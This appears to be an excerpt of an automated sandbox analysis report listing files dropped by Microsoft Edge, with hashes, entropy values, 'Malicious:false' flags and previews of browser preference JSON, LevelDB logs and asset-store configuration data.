                                                                                                                                                                                                                                                                                          Entropy (8bit):4.132041621771752
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:FiWWltlApdeXKeQwFMYLAfJrAazlYBVP/Sh/JzvPWVcRVEVg3WWD5/ll:o1ApdeaEqYsMazlYBVsJDu2ziy5
                                                                                                                                                                                                                                                                                          MD5:524B78A52718E3881DC4D65109515BF4
                                                                                                                                                                                                                                                                                          SHA1:5B42C6DAC78CA50377B6BB7E0B522327A6C2E980
                                                                                                                                                                                                                                                                                          SHA-256:F1E9D007FB89F73564C55A401829EC4A0532850A41BD97EF59D5078CE770C72B
                                                                                                                                                                                                                                                                                          SHA-512:84FD33136516D7893B1B5DE07D642CFA500BA1283EAB13ED906CF8B26332401D5A2C491AF59FD031D6AC8404DD59140CA1362C746154358B18F0EA9D58E7CE67
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:sdPC......................X..<EE..r/y..."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................fdb35e9f-12f5-40d5-8d50-87a9333d43a4............

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\09bd6725-0928-45a4-98a4-4981e065d101.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                          MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                          SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                          SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                          SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\497fd426-5289-4cce-86df-7378fd397a7a.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (14775), with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):14781
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.486380402358094
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:stlQysInfhlCgwDuS1yMYbGvQw/6WZaTYc:sLdnfqgJbG40NaTYc
                                                                                                                                                                                                                                                                                          MD5:B35E269873C4F441892C95CD61A187D1
                                                                                                                                                                                                                                                                                          SHA1:927F31E828E087CBC1BB9C334F3892D067DFF844
                                                                                                                                                                                                                                                                                          SHA-256:5C7C1D2E8265243F3EBB4A1B46CAAE7F7E7852D535412111825E2CEE74A60293
                                                                                                                                                                                                                                                                                          SHA-512:92A8998680C458C9DDA0E93509757CBE8B91CE30533C57101BDA13B45447E2B4AC0DF618A62CF4304037E79F6A2C56E1CCF9590DA99CB8C83BDDC17784AC95AA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380134357689834","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\643ed750-8dcb-418b-ac6e-12aa4a3c634d.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (13971), with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):13977
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.442111367618343
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:stlkdpysIM0sZihUkTSj3HKDuot1yHsIFh68NbV+FRxQwK66WZaFIMYqPaYJ:stlQysInfhTDuS1yMMbGvQw/6WZaTYc
                                                                                                                                                                                                                                                                                          MD5:37EC09CEE7B6E449DD608A823D22A93F
                                                                                                                                                                                                                                                                                          SHA1:64424D56D7A18130FD63A04D3477F75CB448A79A
                                                                                                                                                                                                                                                                                          SHA-256:9640A2859906595350D9D5600F840794AC7F09F051B9279439C516BC1316E674
                                                                                                                                                                                                                                                                                          SHA-512:FC42AF405E24A03F36068F8F39AC1B464A3534C091B91BEF8B051A4C763FCABCF40D9ABF5528835C9562CCC80BB419879CCC80A974F0E000477CE1665AF7388D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380134357689834","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):33
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                          MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                          SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                          SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                          SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):307
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.266911097463874
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5CgTv81923oH+Tcwtp3hBtB2KLlrCgjUjN+q2P923oH+Tcwtp3hBWsIFUv:XJYebp3dFLBSIv4Yebp3eFUv
                                                                                                                                                                                                                                                                                          MD5:07FEB386EA286374FDD06403CA1D107A
                                                                                                                                                                                                                                                                                          SHA1:D5AA925644DA4B1A41FC187303BF09684C544E0A
                                                                                                                                                                                                                                                                                          SHA-256:D433469C83D27D2239704DBC043FA50A8DC324A1411025D2A2995CDD7B50F2B2
                                                                                                                                                                                                                                                                                          SHA-512:71586544488D5ECBD19F780BB8A77E5C4BF2EE90BA590FA340B41B6C96CC9D2EED01081CB846BFE04D59EDAF7323758D34372A1A4E7FE213EA3F992E0F018067
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/31-10:59:21.596 168 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/31-10:59:21.686 168 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):41
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                          MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                          SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                          SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                          SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                          Size (bytes):480979
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.3948149472221925
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:v+477TZyhJOGiMlbOFbXG/KFd2X13p8S15tndAYDI11csxd:v+4zZoOG1eLG/KKp8cdAYDI11csn
                                                                                                                                                                                                                                                                                          MD5:B658133BDE3E13D7C42F47CCBB6C4D62
                                                                                                                                                                                                                                                                                          SHA1:2F8CE735E9DBD07A57DF08DA98077F54A1BBA535
                                                                                                                                                                                                                                                                                          SHA-256:2CE628C1241357B616B33ACC08FCDEBE5B47402F3FD9AC31191F425BF3853061
                                                                                                                                                                                                                                                                                          SHA-512:63B74E52C13B6BEDDB5BEAF82BCD85230068729535FE70925AE8B957BB3713C6A77A452BBA5FB5B9B2D2AAC46B59445ED09F9E535C92360DB0621EA44B3D6566
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...m.................DB_VERSION.1.l.i.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340900604462938.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):336
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.105634347596793
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5Cs/34q2P923oH+Tcwt9Eh1tIFUt8MCS/3JZmw+MCNVj3DkwO923oH+Tcwt9Eh1H:f/Iv4Yeb9Eh16FUt8kZ/+PP5LYeb9Ehx
                                                                                                                                                                                                                                                                                          MD5:BBD78A70D29716FE204800FAB62E524B
                                                                                                                                                                                                                                                                                          SHA1:0840FA9F11F58D8D509E309932FB3008359C844E
                                                                                                                                                                                                                                                                                          SHA-256:71BB3D8F204256F502022CD4B904566307CA36A7F343D5A68C24D48098D9E5C8
                                                                                                                                                                                                                                                                                          SHA-512:144894741018570D494248389046B508E2C2C7A4939388D9D3F13C0E85AB5E6FAA28C672A1DC900078D15ADEC0EA821743F5CEA510FD16084838BB4F0708D988
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/31-10:59:21.525 1e04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/31-10:59:21.527 1e04 Recovering log #3.2024/12/31-10:59:21.582 1e04 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):336
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.105634347596793
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5Cs/34q2P923oH+Tcwt9Eh1tIFUt8MCS/3JZmw+MCNVj3DkwO923oH+Tcwt9Eh1H:f/Iv4Yeb9Eh16FUt8kZ/+PP5LYeb9Ehx
                                                                                                                                                                                                                                                                                          MD5:BBD78A70D29716FE204800FAB62E524B
                                                                                                                                                                                                                                                                                          SHA1:0840FA9F11F58D8D509E309932FB3008359C844E
                                                                                                                                                                                                                                                                                          SHA-256:71BB3D8F204256F502022CD4B904566307CA36A7F343D5A68C24D48098D9E5C8
                                                                                                                                                                                                                                                                                          SHA-512:144894741018570D494248389046B508E2C2C7A4939388D9D3F13C0E85AB5E6FAA28C672A1DC900078D15ADEC0EA821743F5CEA510FD16084838BB4F0708D988
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/31-10:59:21.525 1e04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/31-10:59:21.527 1e04 Recovering log #3.2024/12/31-10:59:21.582 1e04 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):28672
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.4624518429432881
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBuc:TouQq3qh7z3bY2LNW9WMcUvBuc
                                                                                                                                                                                                                                                                                          MD5:8C1E3F0E22A61908621F38CBE29A5D03
                                                                                                                                                                                                                                                                                          SHA1:73B219334DA3EF5A9BF6D971ADC5F29E05A30842
                                                                                                                                                                                                                                                                                          SHA-256:00421A6A4A2CE77251FFB9FC2172B2246C4BFB6A4264FAD536635845AEB800E4
                                                                                                                                                                                                                                                                                          SHA-512:82A5869629028368FAA9D0BD4E4044FC427ADC0260BDC6D65CF7307B7A831C1901EEE24CCD20C063BB29E6C00CAE48E936C020C1A27E291075BB1EC2BB7EA2E3
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):345
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.219607297150455
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5OVq2P923oH+TcwtnG2tMsIFUt8MAYgZmw+M/wIkwO923oH+TcwtnG2tMsLJ:Mv4Yebn9GFUt8Fh/+ez5LYebn95J
                                                                                                                                                                                                                                                                                          MD5:2FCF3C12072582A57A6F457F9D65CED3
                                                                                                                                                                                                                                                                                          SHA1:13503C1F71936549DF9AFEA6BD5CA6BC8E41177D
                                                                                                                                                                                                                                                                                          SHA-256:9E5E78D2A868A1ECD0A629F07FEC6B3A98A4329AFD82EEB8FA83A7EAB6CFD2C3
                                                                                                                                                                                                                                                                                          SHA-512:DD1EC571BB299F7C0AAB0E2B69413CEDF0AAA32BCECD0A2143B34B1E09E2AD72A35BA71EC8477F049D0574944E03BDCC7C8CF49280A3C21F71F06947268AD087
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/31-10:59:17.153 6f0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/31-10:59:17.154 6f0 Recovering log #3.2024/12/31-10:59:17.155 6f0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):345
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.219607297150455
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5OVq2P923oH+TcwtnG2tMsIFUt8MAYgZmw+M/wIkwO923oH+TcwtnG2tMsLJ:Mv4Yebn9GFUt8Fh/+ez5LYebn95J
                                                                                                                                                                                                                                                                                          MD5:2FCF3C12072582A57A6F457F9D65CED3
                                                                                                                                                                                                                                                                                          SHA1:13503C1F71936549DF9AFEA6BD5CA6BC8E41177D
                                                                                                                                                                                                                                                                                          SHA-256:9E5E78D2A868A1ECD0A629F07FEC6B3A98A4329AFD82EEB8FA83A7EAB6CFD2C3
                                                                                                                                                                                                                                                                                          SHA-512:DD1EC571BB299F7C0AAB0E2B69413CEDF0AAA32BCECD0A2143B34B1E09E2AD72A35BA71EC8477F049D0574944E03BDCC7C8CF49280A3C21F71F06947268AD087
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/31-10:59:17.153 6f0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/31-10:59:17.154 6f0 Recovering log #3.2024/12/31-10:59:17.155 6f0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):375520
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.354087032972708
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:pA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:pFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                          MD5:3BD207BB0CF10B31C56F9E5262F09491
                                                                                                                                                                                                                                                                                          SHA1:9077E64E17BD0B3D2DFB4D47FA4A9635C8B65483
                                                                                                                                                                                                                                                                                          SHA-256:F708CA7E44ABB4FB3054C540D9FD669B3B2CE62BDFE06F7B6F5C436837834839
                                                                                                                                                                                                                                                                                          SHA-512:1C8F5176DF0C78D2E1F8483BB268600632DCCB05266D1A0B714718C4CF23AC87C78187F359A6ED7E1EC14BD7A7DD958219C581E0AF1CA17EC4F6A38C353BFA64
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...m.................DB_VERSION.1"..^q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13380134363466705..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

